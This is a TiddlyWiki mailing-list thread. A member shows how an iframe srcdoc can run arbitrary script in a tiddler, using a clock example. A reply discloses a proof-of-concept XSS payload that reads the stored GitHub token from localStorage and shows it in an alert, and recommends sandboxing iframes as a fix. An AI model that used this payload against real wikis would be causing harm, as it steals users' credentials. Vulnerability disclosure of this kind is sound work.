This seems EXTREMELY INSECURE. What is to stop an attacker from injecting
malicious JS into a tiddler, regardless of whether it is "sandboxed".
Paste this Proof-of-Concept into a blank tiddler. What it does it steals
your GitHub PAT if you have it configured, and alerts it to you. While I
have not done it here, I could easily make it both invisible and have it
email me the PAT's it gathers.
CODE:
<$vars vSrcDoc={{{ [[<body> <div
id="clockDiv"></div><script>document.getElementById('clockDiv').innerHTML =
`<a id="xss" href="javascript:alert('Your GitHub Token
is:'+localStorage.getItem('tw5-password-github')+'. If it is blank, you
probably don\\'t have TW GitHub saving configured');"></a>`;
document.getElementById('xss').click();</script></body>]] }}}>
<iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
</$vars>
Long-story-short, an attacker can easily bypass any sanitation TW employs,
and harvest credentials from various sites. It is my belief that this issue
needs to be fixed immediately, and brought to the attention of Jeremy and
other devs.
I would be happy to help on the repair process. I have some experience with
PenTesting and fixing XSS vulnerabilities (mainly in my own applications).
I would recommend adding a listener to TW changes, and checking for an
iframe code. If it does contain this, TW should add a sandbox constraint on
it
(https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox)
On Monday, August 16, 2021 at 10:55:46 AM UTC-4 cj.v...@gmail.com wrote:
> Updated one of the tiddlers in the JSON package. New version attached.
>
> The addition highlighted below:
>
> <body>
> <div id="clockDiv"></div>
> <script>
> *document.oncontextmenu = function() { *
> * return false; *
> *};*
> let clockEl = document.getElementById("clockDiv");
> ...
>
> The reason for the added code: block access to the back button in the
> iFrame (by blocking access to the entire menu), which winds up performing
> the back button operation on the entire browser page.
> On Sunday, August 15, 2021 at 11:27:41 PM UTC-3 Charlie Veniot wrote:
>
>> I don't know what made me think of this.
>>
>> In case this has not been brought up in a while (I doubt this is new to
>> seasoned folk) ...
>>
>> I was thinking: could I use an iFrame to include simple javascript in a
>> tiddler without getting into macros or plugins that enable javascript.
>>
>> And, if I could, then could I set things up so that the iFrame is showing
>> javascript dynamically created by the tiddler ?
>>
>> So here is a way to show a digital clock in TiddlyWiki, for
>> non-programmers who just want to copy and paste javascript code from the
>> web without figuring out how the javascript code works :
>>
>> Put this in a brand new tiddler:
>>
>> *<$vars* *vSrcDoc*={{{ [[<body> <div id="clockDiv"></div> <script>
>> let clockEl = document.getElementById("clockDiv"); function
>> getClockTime() { let date = new Date(); let hr =
>> date.getHours(); let min = date.getMinutes(); let sec =
>> date.getSeconds(); hr = ("0" + hr).slice(-2); min = ("0" +
>> min).slice(-2); sec = ("0" + sec).slice(-2); clockEl.innerHTML =
>> `${hr}:${min}:${sec}`; } setInterval(getClockTime, 1000);
>> </script></body>]] }}}*>*
>> *<iframe* srcdoc=*<<vSrcDoc>>* style="border:none;width:100%;"
>> *></iframe>*
>> *</$vars>*
>>
>> Sneaky sneaky, has me wondering what kind of other fun things could be
>> done...
>>
>
--
You received this message because you are subscribed to the Google Groups
"TiddlyWiki" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to tiddlywiki+unsubscr...@googlegroups.com.
To view this discussion on the web visit
https://groups.google.com/d/msgid/tiddlywiki/849648f9-ac4b-4722-a6da-184939f02a7an%40googlegroups.com.
